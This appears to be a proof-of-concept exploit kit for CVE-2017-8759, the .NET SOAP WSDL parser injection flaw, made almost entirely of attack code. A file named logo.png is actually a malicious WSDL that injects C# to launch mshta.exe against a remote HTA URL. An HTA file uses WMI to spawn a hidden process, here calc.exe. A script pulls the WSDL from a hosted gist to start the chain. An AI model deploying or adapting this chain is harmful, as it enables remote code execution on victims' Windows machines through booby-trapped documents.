CVE-2017-8759

exploit.pptx

logo.png

<definitions
    xmlns="http://schemas.xmlsoap.org/wsdl/"
    xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"
    xmlns:suds="http://www.w3.org/2000/wsdl/suds"
    xmlns:tns="http://schemas.microsoft.com/clr/ns/System"
    xmlns:ns0="http://schemas.microsoft.com/clr/nsassem/Logo/Logo">
    <portType name="PortType"/>
    <binding name="Binding" type="tns:PortType">
        <soap:binding style="rpc" transport="http://schemas.xmlsoap.org/soap/http"/>
        <suds:class type="ns0:Image" rootType="MarshalByRefObject"></suds:class>
    </binding>
    <service name="Service">
        <port name="Port" binding="tns:Binding">
            <soap:address location="http://localhost?C:\Windows\System32\mshta.exe?https://docs.rw.md/calc.hta"/>
                        <soap:address location=";
                        if (System.AppDomain.CurrentDomain.GetData(_url.Split('?')[0]) == null) {
                                System.Diagnostics.Process.Start(_url.Split('?')[1], _url.Split('?')[2]);
                                System.AppDomain.CurrentDomain.SetData(_url.Split('?')[0], true);
                        } //"/>
        </port>
    </service>
</definitions> 

w00t.hta

<html>
<head>
<script language="VBScript">
Sub window_onload
	const impersonation = 3
	Const HIDDEN_WINDOW = 12
	Set Locator = CreateObject("WbemScripting.SWbemLocator")
	Set Service = Locator.ConnectServer()
	Service.Security_.ImpersonationLevel=impersonation
	Set objStartup = Service.Get("Win32_ProcessStartup")
	Set objConfig = objStartup.SpawnInstance_
	objConfig.ShowWindow = HIDDEN_WINDOW
	Set Process = Service.Get("Win32_Process")
	Error = Process.Create("calc.exe", null, objConfig, intProcessID)
	window.close()
end sub
</script>
</head>
</html>

wsdl.js

GetObject("soap:wsdl=https://gist.githubusercontent.com/rxwx/846c2e3b32c0c659b61e59be26790632/raw/c6f8c55f1d31262f72cf328b2fb72b0c581a6fdc/logo.png")